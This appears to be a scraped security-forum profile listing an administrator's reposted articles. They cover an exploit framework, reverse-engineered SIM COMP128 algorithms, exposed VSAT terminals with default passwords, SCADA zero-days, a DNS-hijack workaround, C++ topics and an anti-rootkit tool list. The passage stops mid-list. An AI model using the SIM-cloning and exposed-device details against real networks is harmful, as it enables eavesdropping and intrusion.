Jump to content

Nytro

Administrators
  • Posts

    18736
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. Bowcaster Exploit Development Framework This framework, implemented in Python, is intended to aid those developing exploits by providing useful set of tools and modules, such as payloads, encoders, connect-back servers, etc. Currently the framework is focused on the MIPS CPU architecture, but the design is intended to be modular enough to support arbitrary architectures. To install, run: python setup.py install Sursa: https://github.com/zcutlip/bowcaster
  2. [h=3]Secrets of the SIM[/h] First project that I would like to share is regarding the SIM card's "secret" key derivation algorithm, the COMP128. I was requested to put together a small presentation about the old GSM system's security at my former employer. As I really hate presentations without any real hands on experience, I wanted to actually show the internal mechanisms of the SIM and the mobile phone as well as the base station's communication in the presentation so I did a "quick" search (took two days) about the current situation of GSM related software and tools available to a simple person, that can be used to put together something interesting. The results are a bit shocking... but in a good way I will describe the mobile phone and the BTS emulation part later, since all of the information about them can be found on the Internet already. To show the internal mechanisms of a SIM card as well as the communication between the SIM and the mobile phone, I found the following tools to be handy: 1. SimTrace This little hardware is awesome!!! It sniffs the communication between the SIM and the telephone and integrates into Wireshark with a normal dissector for parsing the raw data, so you are able to see what goes on the wire on-the-fly. 2. A programmable SIM card This programmable SIM can be used like a standard SIM but you can actually change the master key (Ki) used for key derivation. Also it can switch the used derivation algorithms (COMP128 v1/v2/v3), which is really handy. And that's it for tools. For the next step to put this part of the presentation together I had to refresh my memory about how the authentication and encryption is carried out in GSM. Wikipedia and Google is here to help as always. Security features in GSM in a nutshell: 1. Challenge-Response Authentication 2. Symmetric encryption (A5) The common secret is a 16 byte number stored in the SIM card and also it's stored at the respective mobile operator, it is called "Ki". Since the SIM is a smartcard, it is considered secure and we all hope that our mobile operator is storing it in a real secure way also . (otherwise every call and data could be decrypted if it falls in the wrong hands) GSM authentication 1. The base station sends a 16 byte random number RAND (I'm really curious if it's really random...) 2. The SIM card gets this RAND and uses the Ki (the secret number) to feed the A3A8 (other name is COMP128) algorithm. The output is a 12 byte long number, call it OUTPUT. 3. The OUTPUT is split into two parts, the upper 4 byte is called the SRES the lower 8 byte is the Kc. 4. The SRES will be sent back to the base station as the authentication response. ---- on the other end of the line, the mobile operator does that same algorithm, because he knows our key (Ki), he will calculate the SRES and the Kc. If the mobile operator's SRES matches the SRES we sent back, then we are authenticated on the network ----- 5. The Kc is sent to the mobile phone from the SIM card. It will be used as the encryption key for the A5 algorithm (not discussed here) Key derivation Using SIMTrace and Wireshark, we can see that the mobile phone sends only one command to the SIM card together with the RAND, and the card sends back the SRES+KC bytes. This can be observed in plain text The big question remained, that how does exactly the COMP128 algorithm work? After some searching I found that there are three versions of the COMP128, but only the first one could be found available for everyone. -------------------- A little history: after version 1 of the COMP128 got published it turned out that from observing the input and the output of the algorithm for several inputs, one can easily recover the secret key Ki. This means SIM card cloning! And also means, that if someone previously "checked" your sim card before you obtained it from the shop or from your company, he will know the secret key so if he manages to sniff your calls over the air, he will be able to decrypt the communication without much effort. So far only version 1 is known to be weak against this birthday-paradox based attack,and this is why it's not used any more (discontinued in 2002). Since version 2&3 have not been officially published (again I have not found any publication of it so far), excessive cryptanalysis probably have not been carried out on it (khmm.... just saying...) -------------------- It seems that version 2 and 3 has not been published yet, or I was looking on the wrong Google? So I kinda became frustrated that this presentation will be a bit incomplete, so I decided to dig a bit further. Luckily I "found" a test software used for SIM card compliance checks, which had the feature to check the version 2 & 3 of the algorithm also! Only one thing was left, reverse engineer the software to get to know the actual algorithm and then check against a valid implementation to be sure -remember the programmable SIM card I mentioned? . Using IDA I was able to recover the two algorithms from the software and implemented them to pure python. (Have I mentioned that I love Python?) It took some time, but I think it was a really good opportunity to learn a bit more about IDA The testing part almost took the same time as the reverse engineering, because the command to change the algorithm of the programmable SIM was not working as described in the documentation -if we can call that poorly written nothing documentation- (I'll post the working command but right now I don't know where I have put it) For this, I have written a small python script to load a key into the programmable SIM, generate 1024 random 16 byte long RAND number, then send it as the argument of the AUTH command, and store the response. (doing this to both v2 and v3 is like a little brute forcing huh?) Another script was responsible to cross check the results from the SIM with the result from the python script. No errors were found This however doesn't mean that my implementation of the COMP128v2 and v3 is perfect and completely following the standard (as this part of the standard is not published as far as I know), so please check it yourself and let me know the details. Some words about the COMP128. In v1 and v2 the last byte of the Kc was always 0x00, and the byte before the last was guessable -could only be 4 different value if I remember correctly, This means that the key used to encrypt your communication was weakened on purpose. In v3 this "limitation" was finally removed, but that doesn't help much to increase the security since the encryption algorithm used in GSM communication (A5) is officially broken. If you want security switch to 3G, the algorithms used for encryption and authentication there are public and so far there are not publicly known weakness in them (as far as I'm aware) I hope by sharing this algorithm I help everyone who wants to know how the SIM card works to get a better understanding. I was thinking about implementing this algorithm into a Java card thus creating programmable SIMs, or using it as a software emulated SIM solution to test some weaknesses in the GSM network but so far I have a lot of work to do, If someone will do this please drop me a mail Implementation and some test vectors -not a well defined test vector set I know-: comp128.7z Thank you for reading! p.s.: this is my first blog ever, suggestions how to do it better are always welcome Posted by Hacking Projects at 09:24 Sursa: Hacking Projects: Secrets of the SIM
      • 1
      • Upvote
  3. Un subiect foarte interesant, voi scrie un tutorial complet despre prietenie.
  4. Using Regular Expressions with Modern C++ Kenny Kerr “C++ is a language for developing and using elegant and efficient abstractions.” —Bjarne Stroustrup This quote from the creator of C++ really sums up what I love about the language. I get to develop elegant solutions to my problems by combining the language features and programming styles that I deem most suitable to the task. C++11 introduced a long list of features that are in themselves quite exciting, but if all you see is a list of isolated features, then you’re missing out. The combination of these features makes C++ into the powerhouse that many have grown to appreciate. I’m going to illustrate this point by showing you how to use regular expressions with modern C++. The C++11 standard introduced a powerful regular expression library, but if you use it in isolation—using a traditional C++ programming style—you might find it somewhat tiresome. Unfortunately, this is the way that most of the C++11 libraries tend to be introduced. However, there is some merit in such an approach. If you were looking for a concise example of using some new library, it would be rather overwhelming to be forced into comprehending a slew of new language features at the same time. Still, the combination of C++ language and library features really turns C++ into a productive programming language. Articol: Windows with C++ - Using Regular Expressions with Modern C++
  5. Security researchers at IntelCrawler, a Los-Angeles based cyber intelligence company, discovered that VSAT terminals are opened for targeted cyber attacks. VSAT terminals (very-small-aperture terminal) used for satellite communications are vulnerable to external cyber attacks, the discovery was made by security researchers at IntelCrawler, a Los-Angeles based cyber intelligence company. The VSAT vulnerability appears serious and have a significant impact on distributed critical infrastructures and network environments. VSATs are most commonly used to transmit: narrowband data (a channel in which the bandwidth of the message does not significantly exceed the channel’s coherence bandwidth), typical applications are the transmission of payment transaction from point of sales, or transmission of data from/to SCADA systems. broadband data (a channel with wide bandwidth characteristics of a transmission medium and the ability to transport multiple signals and traffic types simultaneously), typical applications are the provision of satellite Internet access to remote locations, VoIP or video data transmissions. VSATs are also used for transportable, on-the-move (utilizing phased array antennas) or mobile maritime communications. VSAT statistics included in The Comsys VSAT report confirm that there are 2,931,534 active VSAT terminals in the world now, primarily in the industrial sector, such as energy, oil and gas, because the infrastructure is based on distributed environments located in different geographic locations. IntelCrawler has scanned the overall IPv4 address space to conduct intelligence analysis on the data retrieved. “We have scanned the whole IPv4 address space since 2010 and update the results in our Big Data intelligence database, including details about satellite operators network ranges, such as INMARSAT, Asia Broadcast Satellite, VSAT internet iDirect, Satellite HUB Pool, and can see some vulnerabilities,” states Dan Clements, IntelCrawler President. Within the huge amount of data collected by IntelCrawler there are also approximately 313 open UHP VSAT Terminals, 9045 open HUGHES Terminals, 1142 SatLink VSAT and many others . It is important for the network engineers and system administrators to self-assess and close or plug any possible exploits. VSAT devices are connected to many interesting devices all over the world, starting from Alaska climate metering systems to industrial control devices in Australia, and many work with the help of C, Ka, Ku and X-Band satellite ranges. IntelCrawler researchers have noted, many VSAT devices have telnet access with very poor password strength, many times using default factory settings. The fact that one can scan these devices globally and find holes is similar to credit card thieves in the early 2000?s just googleing the terms “order.txt” and finding merchant orders with live credit cards. The onus is on the enterprises, governments, and corporations to police themselves. An attack against those devices could have serious repercussion as explained by Dan Clements. “Intrusions to such open devices can allow you to monitor all the network traffic related to the exact device or host, sometimes with very sensitive information, which can lead to a compromise of the internal network,” – said Dan Clements, IntelCrawler’s President. Some of the VSATs are readily visible in Google maps and Google Earth. Again, system administrators should assess the physical security to these locations and make sure all is secure. Satellite network ranges have lots of interesting objects, including government and classified communications. For example, during some research IntelCrawler found Ministry of Civil Affairs of China infrastructure in the ranges belonging to Shanghai VSAT Network Systems Co. LTD, and Ministry of Foreign Affairs of Turkey in Turksat VSAT Services, which is a clear and present danger for hacks. About IntelCrawler IntelCrawler.com is a multi-tier intelligence aggregator, which gathers information and cyber prints from a starting big data pool of over 3, 000, 000, 000 IPv4 and over 200, 000, 000 domain names, which are scanned for analytics and dissemination to drill down to a desired result. This finite pool of cyber prints is then narrowed further by comparing it to various databases and forum intelligence gathered from the underground and networked security company contacts. The final result could be the location of a particular keyboard or a computer housing the threat. Pierluigi Paganini (Security Affairs – VSAT, hacking) Sursa: VSAT terminals are opened for targeted cyber attacks
  6. An overview on smart pointers 2014-01-10 11:20 by Jens Weller My last blog post in 2013 was about the pointer in C++, and how most of its daily usages in C++ is now being replaced by classes replacing or managing the pointer. The last case, the RAII like objects called smart pointers is the topic of this post. I want to give an overview over the choices one can make when using smart pointers. As I studied last year boost, Qt and wxWidgets closer, I saw, that all of them have their own implementations of smart pointers. Also, C++11 brings its own set of two classes of smart pointers. So, with C++11, smart pointers have arrived in the standard, and everyone using C++11 automaticly has 2 different good options for managing memory allocated with new. Should you use smart pointers? I think its good to discuss this point first, when you should use smart pointers, and when not. Smart pointers are only useful when used with new, or the corresponding make functions (make_shared and make_unique in C++14 f.e.). So, a smart pointer is only needed, when you use new or other means of dynamic memory allocation. In my opinion, you should prefer to allocate variables on the stack, so when refactoring code (to C++11), you should always ask yourself, if this new is needed, or could be replaced with an object on the stack. When you need to use new, you should always use a smart pointer in my opinion. Also some smart pointers offer a custom deleter, which is handy if you have an object that is either not allocated by new and/or needs to be freed by calling a special function. A (not so) short overview on smart pointers As mentioned, with C++11 two new classes came to the C++ Standard, introducing shared_ptr and uniqe_ptr for the means of managing memory allocated with new. Previously there has been std::auto_ptr in the standard, which is now deprecated. The idea to use smart pointers is at least 20 years old, as the documentation of boosts Smart Ptr Library shows. Also boost has been the go to place for smart pointers before C++11, and for example wxWidgets has copied their Smart Pointer version from boost in 2009. Lets compare some of the implementations: [TABLE=class: schedule] [TR] [TD]Name[/TD] [TD]copyable[/TD] [TD]moveable[/TD] [TD]custom deleter[/TD] [TD]can release ownership[/TD] [TD]comment[/TD] [/TR] [TR] [TD]std::unique_ptr[/TD] [TD]no[/TD] [TD]yes[/TD] [TD]yes (by policy)[/TD] [TD]yes[/TD] [TD][/TD] [/TR] [TR] [TD]std::shared_ptr[/TD] [TD]yes[/TD] [TD]yes[/TD] [TD]yes[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]boost::scoped_ptr[/TD] [TD]no[/TD] [TD]no[/TD] [TD]no[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]boost::shared_ptr[/TD] [TD]yes[/TD] [TD]yes[/TD] [TD]yes[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]QScopedPointer[/TD] [TD]no[/TD] [TD]no[/TD] [TD]yes[/TD] [TD]yes[/TD] [TD][/TD] [/TR] [TR] [TD]QSharedPointer[/TD] [TD]yes[/TD] [TD]no[/TD] [TD]yes[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]wxScopedPtr[/TD] [TD]no[/TD] [TD]no[/TD] [TD]no[/TD] [TD]yes[/TD] [TD][/TD] [/TR] [TR] [TD]wxSharedPtr[/TD] [TD]yes[/TD] [TD]no (C++03)[/TD] [TD]yes[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]poco::AutoPtr[/TD] [TD]yes[/TD] [TD]no (C++03)[/TD] [TD]no[/TD] [TD]no[/TD] [TD]A certain interface must be provided by T.[/TD] [/TR] [TR] [TD]poco::SharedPtr[/TD] [TD]yes[/TD] [TD]no (C++03)[/TD] [TD]yes (by policy)[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]dlib::scopted_ptr[/TD] [TD]no[/TD] [TD]no[/TD] [TD]yes[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]dlib::shared_ptr[/TD] [TD]yes[/TD] [TD]no (C++03)[/TD] [TD]no[/TD] [TD]no[/TD] [TD]not threadsafe[/TD] [/TR] [TR] [TD]dlib::shared_ptr_thread_safe[/TD] [TD]yes[/TD] [TD]no (C++03)[/TD] [TD]no[/TD] [TD]no[/TD] [TD]threadsafe[/TD] [/TR] [TR] [TD]ACE::Value_Ptr[/TD] [TD]yes (but copies the pointee)[/TD] [TD]no (C++03)[/TD] [TD]no[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]Glib::RefPtr[/TD] [TD]yes[/TD] [TD]no[/TD] [TD]no[/TD] [TD]no[/TD] [TD][/TD] [/TR] [TR] [TD]Loki::SmartPtr[/TD] [TD]yes per default[/TD] [TD]maybe over policies, else no[/TD] [TD]no[/TD] [TD]no[/TD] [TD] mostly policy based, very flexible[/TD] [/TR] [TR] [TD]Loki::StrongPtr[/TD] [TD]yes per default[/TD] [TD]see above[/TD] [TD]yes[/TD] [TD]no[/TD] [TD] see above and Lokis Smart Pointer Page[/TD] [/TR] [/TABLE] A few words on this table. Most all libraries have implemented smart pointers way before C++11, so move constructors are not implemented and move behavior in general is not documented. Shared classes do share the pointer through different instances through RefCounting. I do have experience with using the standard version, boost, Qt and wxWidgets, the other data is taken from the documentation of those libraries. I think that is enough for a first overview. Many other libraries probably have written their own versions, some even might have oriented their solution on boosts Smart Ptr library as wxWidgets did, and also the C++11 smart pointers have their roots in the boost versions. I didn't list platform or library specific smart pointers (except poco::AutoPtr). Also some older libraries model std::auto_ptr. A special case is the smart pointer implementation from loki, as its very versatile and can be configured via policy based design. Per default its shared, but you can create/use a non shared policy. So, smart pointers can be classified into (mainly) 4 categories: scoped/unique shared (Refcounting usually) intrusive / interfacebased framework specific Scoped and unique smartpointers This is the most common class, and in my opinion also the sort of smart pointer you should mostly use, and only if your specific use case REALLY breaks the case for this type, think about using any of the other types. The scoped pointer ensures, that an allocated object is destroyed when its scope ends. Interestingly Poco seems to lack this type of smart pointer. A special case is std::unique_ptr, as it does not have the same behavoir as the scoped pointers. It is allowed to escape its scope through a move. This makes it possible to have a container of unique_ptr, or f.e. a factory returning them, also C++14 will add make_unique. With the addition of make_unique in C++14 also the use of new (and also delete) is handled in the background. So the need for directly using new and delete is (mostly) gone. Non owning pointers to scope or unique pointeres still need to be raw pointers. There is a proposal called exempt_ptr, which could take this role. Shared smart pointers Some times you need the ability to share a pointer between classes and objects, and so smart pointers have a shared type, which ensures through refcounting, that the held pointer stays valid till the last instance is destroyed. So each time a copy of the first shared pointer is destroyed, the refcount goes down, if it ever reaches 0 the object is destroyed. Ever? Yes. That is one of the problems with this implementation, there can occur a cyclic dependency, that prevents one or more smart pointers from ever being destroyed. For example if you would model a parent child relation with two shared pointers. This is why (most) shared pointer implementations today also bring a weak_ptr, which can be converted into a shared pointer when needed. The weak_ptr only holds a weak link to the original object. This is usually with two counters implemented, one for strong references (e.g. actual copies) and one for weak pointer objects. The allocation of the actual object can be a bit special with shared pointers, as also the variable for refcounting should be allocated on the heap. This is a very good use case for placement new, as it allows to only have one call to new allocating the space for the counters and the actual object. This is only possible if its done in a make_shared like function, not inside of a constructor from a shared pointer type. Interestingly I'm only aware of std::make_shared and boost::make_shared, the other shared pointer implementations don't mention special make functions. But shared pointers are only good in a few places. You should be aware, that this is more or less a globally shared variable, most implementations are not threadsafe for accessing the held pointer, some might not even have threadsafe reference counting. Only using a shared_ptr<const T> should be viewed as safe, as it only shares a const object which can not be altered. Also const methods are thread safe in C++. Intrusive / Interface based smart pointers I didn't list boost::intrusive pointer, and some other frameworks have similar solutions. Also poco::AutoPtr belongs into this class. This class usually holds a pointer which has some internal mechanism for refcounting. It can be used for interfacing with COM or other APIs and c libraries. Also some frameworks offer interfaces which you need to implement for a certain type in order to use the smart pointer interface. This is usually a function/method for incrementing and decrementing, and maybe release. Framework specific (smart) pointer classes There do exist a few smart pointer classes which are framework specific. For example QPointer is designed to hold a QObject derived instance, it does not call delete when it is destroyed, but when the QObject is destroyed it will no longer point to it. Also Qt offers QSharedDataPointer, a shared pointer which allows implicit sharing, in order to use QSharedPointer you have to derive from QSharedData. Also CComPtr from the ATL can be seen either as an intrusive variant or a framework specific smart pointer. Refactoring towards smart pointer usage So, now where an overview is given, and also a little bit about the correct usage is written, I'd like to focus on refactoring. There is a lot of code which currently does not use smart pointers. Even newly written SDKs some times do not use them, but mostly use delete correctly. One of the advantages of smart pointers is, that they ensure due to RAII, that the actual object is deleted. When using a raw pointer, you need to have a delete for every possible exit point, and still an exception will lead to a memory leak. Smart pointers will also free the memory if an exception occurs. I'd like to share a little story for this. A few years ago there was an SDK for a certain mobile platform released, and as OO code, there was a need to use new on all kinds of objects. I was interested in writing apps for this platform, so I visited a public event for app developers for this SDK. I even got a phone! After the event there was some socializing, and I got to talk to a person belonging to the devteam for the C++ API. I asked him why they didn't use smart pointers, instead of letting the users produce all kind of memleaks on their platform. The answer was "What are smart pointers?" So, it turns out, they used C++, and never had heard about smart pointers. So, lets say, for our industry, smart pointers are not standard, and there is some amount of code that needs refactoring. You have to be very careful in refactoring a simple pointer into a smart pointer. Memberpointers within a class usually can be converted, but you have to find out if you can make the pointer a unique/scoped pointer, or if it is shared amongst different objects, requiring to make it a shared pointer. Use features of your IDE like show all usages, to see if and how you can convert a simple pointer to a smart pointer. Some pointers are just non owning pointers, this is fine if the pointer it self is either pointing to an non-newed object or one held in a unique or scoped pointer. Shared pointers usually have a weak pointer type for this usage. With scoped pointers in (member)functions you have to be a bit more careful. I've seen last year a very hard to find problem with this. Turning a new allocation in a larger function into a scoped ptr did not result into a crash, when the program was still accessing the value. Instead it seemed to work just fine for some time, and things did not even crash, the application was just showing weird values. Interestingly this triggered far earlier in debug mode. Also, a scoped pointer can not be returned from a factory function, but unique_ptr can use move semantics. Custom deleters & smart arrays The above table shows, that some smart pointer classes offer custom deleters, and some do not. Also boost does not support this feature for scoped_ptr. Maybe because you easily could implement this for yourself, simply a class wrapping a pointer to T and doing the correct thing in the destructor. This class then can be directly used on the stack or be wrapped into a shared smart pointer. A special case are arrays allocated with new[]. boost has its own classes for this (scoped_array and shared_array), also boost::shared_ptr has traits to detect array usage, and correctly free it with delete [] instead of delete. Smart pointers that have a custom deleter can be used with smart arrays and an array deleter. So which smart pointer should you prefer? As I already wrote, use the stack if possible, and if you need a smart pointer its simply: std::unique_ptr or a Scoped Ptr > shared pointer > intrusive pointer > framework specific pointer classes This leaves the question, which implementation you should favor using. And I think, that is something which has to be decided on the local needs of the code you use. For libraries I think that the standard implementations are good, but that if you need backwards compatibility to < C++11, boost is as good. But, if you already use a framework such as Qt or wxWidgets, you also can use their implementations. For shared smart pointers you always should prefer to call the make_shared function (if the implementation offers one), the standard offers with C++14 also for unique_ptr a make_unique function. Disadvantages of smart pointers There two things which can be seen as disadvantages, actually its only one little overhead and one issue with the standardization of smart pointers. First, with C++11, smart pointers (and some other nice things) are now part of the standard, before C++11 this was a very good argument to use boost. I think that boost has many other advantages, but smart pointers are a good door opener, especially in more restricted areas, where you have to get libraries or frameworks approved before using them. Second, there is a little overhead. Shared pointers add usually two counting variables to the memory needs of your class, while unique_ptr is just a wrapper. This is a tiny overhead in memory usage, which is largely outperformed by the security smart pointers offer. Only a few embedded devices should not be able to afford this little overhead. Also the little overhead in allocation should be fine for most applications, if you're application is speed critical, you might want to measure if smart pointers have any impact to your system. Go back © 2014 Code Node Ltd. All rights reserved. Sursa: An overview on smart pointers - Meeting C++
  7. [h=1]UK's Ministry of Defence funds "hacker culture" research[/h]he UK's Ministry of Defence (MoD) is doling out millions of dollars for research pertaining to hacker culture and the impact social media has in moments of crises. Over the past five years, the MoD's Defence Science and Technology Laboratory has funded multiple PhD projects, and this year awarded more than $100,000 toward research on the rise of digital insurgency, according to The Telegraph. The study will analyze hacker collective Anonymous in order to understand the group's goals and what entices potential members to join. Additionally, the MoD gave students a grant to look at the influence online and offline behavior has on users' social network identities. The PhD candidates hope to determine the role these platforms have on events such as the Arab Spring. Since the funding first began, more than $1.4 million has been awarded. Sursa: UK's Ministry of Defence funds "hacker culture" research - SC Magazine
  8. Bypassing a DNS man-in-the-middle attack against Google Drive Boston to New York City is a frequently traveled route, so a number of different bus lines provide service between the cities. Most offer free WiFi as an amenity. However, all WiFi is not created equal. Today I was traveling by the Go Bus, and I assumed I’d be able to do some work on the bus. I needed to access a document on Google Drive. However, when I tried to open Drive, I was greeted with this sight. I use OpenDNS instead of relying on my ISP’s DNS servers, and I figured that there was some error on OpenDNS’s end. So, I changed my /etc/resolv.conf to use the Google DNS servers, figuring that that would work. No luck. At this point, I realized that the bus network must be hijacking traffic on port 53, which was easy to test. dig gave me the following output: Visiting 67.215.65.130 directly gives the following page. Saucon TDS uses OpenDNS for DNS lookups, but they redirect undesired lookups to their block page. I confirmed this by asking my neighbor across the aisle to visit drive.google.com - he happened to be using Safari, which gave him a 404-eque page instead of the big red error message that Chrome gave, but that was enough for me to confirm that the bus was, indeed, hijacking traffic on Port 53. But how to fix it? The correct IP address for drive.google.com is actually 74.125.228.1 (ironically, I looked this up using OpenDNS: CacheCheck | OpenDNS). However, entering that IP address into your browser will give you the Google homepage, because unlike most sites, their servers check the hostname (the same is true for all Google subdomains). The fix is actually rather simple - add 74.125.228.1 to /etc/hosts. This will skip the DNS lookup altogether, but the browser will still think that you’re going to drive.google.com “normally” (in a way, you are). I write this post to illustrate how easy it is to get around this kind of traffic shaping, for anybody else who has the misfortune of running into this problem. On principle, supporters of net neutrality oppose traffic blocks based on content (instead of volume). However, Go Bus and Saucon TDS are not simply blocking traffic - they are hijacking it. My DNS queries are made to a third party, and yet they decide to redirect them to their own DNS servers anyway. From a user perspective, this is incredibly rude. From a security perspective, it’s downright malicious. I let them know over Twitter, though I haven’t received a response yet. Other than using a VPN (which would have required advance preparation on my part), is there a long-term solution to authenticating DNS queries? Some people advocate DNSSEC. On the other hand, Tom Tpacek (tptacek), whom I tend to trust on other security matters, strongly opposes it and recommends DNSCurve instead. In the meantime, let’s hope that providers treat customers with respect, and stop this malicious behavior. Sursa: /var/null - Bypassing a DNS man-in-the-middle attack against Google Drive
  9. 5 Video Tutorial Playlists On Assembly Programming! [TABLE] [TR] [TD]Tuesday, December 03, 2013: Looking for video tutorials on Assembly Programming? Seek no more as we bring to you 5 awesome playlists with over 100 videos on different aspects of assembly programming. So pull up your socks and set yourself to get pro in assembly. [/TD] [TD][/TD] [/TR] [/TABLE] 1. SolidusCode - Assembly Language Programming Tutorial https://www.youtube.com/watch?feature=player_embedded&v=ofVFSQguVNI&list=PLF5351B80A7005FA1 Slowly graduating from begging to pro lever of tutorials, this is a series by Solidus Code. 2. Assembly Language Programming Video Course - Hitesh Kumar https://www.youtube.com/watch?feature=player_embedded&v=1p6LfUkWPKI&list=PL4C2714CB525C3CD7 A well explained and elaborated series on assembly programming by Hitesh Kumar. 3. Assembly Language Tutorial - Debojyoti Majumder https://www.youtube.com/watch?feature=player_embedded&v=4VNgd3WM95E&list=PL24A96ADA54E75109 One of the best tutorial collections available online, which has been quoted by quite a many websites. The tutorials end up giving you a fair idea of assembly language. The tutorials start with the theoretical and graduates to the inside of coding. 4. Assembly Language Programming - Rasim Muratovic https://www.youtube.com/watch?feature=player_embedded&v=vtWKlgEi9js&list=PLPedo-T7QiNsIji329HyTzbKBuCAHwNFC This series by Rasim Muratovic is a collection of 38 videos tutorials on Assembly programming. 5. Assembly Language Primer for Hackers – eduprey1 https://www.youtube.com/watch?v=K0g-twyhmQ4&feature=player_embedded&list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB The series consists is a of 11 videos and the total tutorials lasts for 3 hours 22 minutes. Atithya Amaresh, EFYTIMES News Network Sursa: 5 Video Tutorial Playlists On Assembly Programming!
  10. Hackers gain 'full control' of critical SCADA systems By Darren Pauli on Jan 10, 2014 10:06 AM (3 days ago) Over 60,000 exposed control systems found online. Researchers have found vulnerabilities in industrial control systems that they say grant full control of systems running energy, chemical and transportation systems. The vulnerabilities were discovered by Russian researchers who over the last year probed popular and high-end ICS and supervisory control and data acquisition (SCADA) systems used to control everything from home solar panel installations to critical national infrastructure. Positive Research chief technology officer Sergey Gordeychik and consultant Gleb Gritsai detailed vulnerabilities in Siemens WinCC software which was used in industrial control systems including Iran's Natanz nuclear plant that was targeted by the US Stuxnet program. "We don’t have big experience in nuclear industry, but for energy, oil and gas, chemical and transportation sectors during our assessments project we demonstrated to owners how to get full control [of] industrial infrastructure with all the attendant risks," Gordeychik told SC Magazine. The vulnerabilities existed in the way passwords were encrypted and stored in the software's Project database and allowed attackers to gain full access to Programmable Logic Controllers (PLCs) using attacks described as dangerous and easy to launch. A vulnerability was also found in cloud SCADA platform Daq Connect which allowed attackers running a demonstration kiosk to access other customer installations. The vendor told the researchers who reported the flaw to simply 'not do' the attacks. The researchers published an updated version of a password-cracking tool that targeted the vulnerability in Siemens PLC S-300 devices as part of the SCADA Strangelove project at the Chaos Communications Conference in Berlin. They also published a cheat sheet to help researchers identify nearly 600 ICS, PLC and SCADA systems. SCADA Strangelove had identified more than 150 zero day vulnerabilities of varying degrees of severity affecting ICSes, PLCs and SCADA systems. Of those, 31 percent were less severe cross site scripting vulnerabilities and five percent were dangerous remote code execution holes. The latter vulnerabilities were notably dangerous because most of the affected systems lacked defences such as Address Space Layer Randomisation and Data Execution Prevention designed to make exploitation more difficult. But it wasn't just industrial systems that were affected; the researchers found some 60,000 ICS devices -- many which were home systems -- exposed to the public internet and at risk of attack. The most prevalent vendors were Tridium, NRG Systems and Lantronix while the most common devices to be crawled using search engines were the Windcube solar smartgrid system, the IPC CHIP embedded device, and the Lantronix SLS video capture platform. The researchers reported exposed devices to various computer emergency response teams and watchdog groups including the European infosec agency ENSIA. Patched The findings follow the discovery of separate serious vulnerabilities in Siemens industrial ethernet switches that allowed attackers to run administrative tasks and hijack web sessions. Siemens released patches overnight to address the flaws in its SCALANCE X-200 switches that were quietly reported by researchers at security firm IOActive. The flaws related to a lack of entropy in random number generators used in the switches. Researcher Eireann Leverett praised Siemens for its rapid response to fix the flaws. Copyright © iTnews.com.au . All rights reserved. Sursa: http://www.itnews.com.au/News/369200,hackers-gain-full-control-of-critical-scada-systems.aspx
  11. “Advanced” Anti-Rootkit Tool List - Mostly Modern By request comment from Anonymous…out of my Anti-Malware Response “Go-Kit” post. When getting this post organized and reviewing the tools I still have tucked away in my USB collection, it turns out that many, many of them are outdated, haven’t been updated in many years, and quite probably will not work on either more “modern” Windows OS versions like Vista/Win7/Win8 nor detect newer variants of root-kit/boot-kit attacks. Many of the original source pages they came from are now HTTP 404. That doesn’t bode well for their continued usage even if you can find an old binary pack tucked away on a download archive. So, just because tool is listed here is absolutely no guarantee that it will work on your system or even detect a threat if it is there. Some of these tools are “detect and remove” types and others are more like advanced utilities that can be used to hunt for indication of hidden or masked processes and system hooks that could be indications of infection…but then leave it up to you to decide if they are a threat and to remove them yourself. While scan-and-remove tools are “easy” the second type are more helpful as you can better identify and collect data on what is going on for reference and sharing with the threat detection community. AND…as we have learned (DEITYBOUNCE: NSA Exploit of the Day - SANS ISC) advanced threat persistence can be neigh impossible to shake off short of scrapping all your hardware and starting fresh…if you can even trust your new hardware. That said, I did find a few “new-to-me” tools and have listed them here. SO…I go back to my best-available solution…secure-wipe the drive(s)…zero those sectors out…then do a fresh reinstall using known-good install files, and bring the system up to a fully-patched and updated state before saying “Done!” And be sure to multi-scan any and all user-data and files you have backed up/recovered off the drive(s) before you put them back. Cross-contamination is a real pain…both on PC’s and kitchen surfaces. Older GrandStreamDreams blog posts for way-back reference. Note, if you are really curious you can find many more “expired” AntiRootkit tools in these posts if you are really interested. I’ve left most all of them out of this post for reasons as stated above. grand stream dreams: Anti-Rootkit Tools Roundup Revisited - January 2008 post listing AR tools. grand stream dreams: Rootkit Storm and Solutions - January 2007 post. grand stream dreams: Windows Rootkit Detectors - July 2006 post. “Advanced” Antirootkit tools - listed in semi-alphabetical order aswMBR - Avast’s MBR rootkit scanner version 0.9.9. AVG PC Rescue and Repair Toolkit - bootable CD provided by AVG that covers both malware & rootkit attack remediation. Version of posting is 120.130801. Offered in ISO (for CD burning), and RAR/ZIP versions for USB stick AVG Free Bootkit Removal Tool - Rootkit specific tool. Download the “rmbootkit.exe” binary and run it on the system. Version details at time of post report V1.2.0.862. Avira Rescue System - bootable CD version along with documentation files. As of this post binaries dated Dec 2, 2013 so it’s very fresh. BitDefender Labs - Rootkit Remover - comes in both x86 and x64 bit versions. Looks for rootkits and bootkits per theFAQ. Been out a while…version 3.0.2.1 as of time of posting. Comodo Rescue Disk for Windows - bootable CD that can look for and remove detected rootkits and has a feature to download latest signatures before execution to ensure it remains current on detection ability. Supports Windows OS from XP though Windows 8 builds. F-Secure Blacklight Rootkit Eliminator - link via BleepingComputer - Current version as offered via the BleepingComputer page seems to be 2.2.1092.0. When ran on a “modern” Windows OS, it needs Administrator level access and complains about known compatibility problems and then exits without running. Probably still worth using as a backup scanner on XP systems but not likely useful under Win7/Win8. GMER - Rootkit Detector and Remover - This one has been kicking around for a very long time. Latest version is 2.1.19163 released 04-04-2013 and reports support for Windows NT/2000/XP/Vista/7/8 OS versions . The download page has some additional references including video files for tutorial usage. Kaspersky Lab TDSSKiller Rootkit Removal Utility - Supports a wide range of Windows OS systems, uses a GUI interface, and can be run in both normal and safe modes. Current version as of this post is 2.8.16.0. Also available in a portable version: Kaspersky TDSSKiller Portable Malwarebytes : Malwarebytes 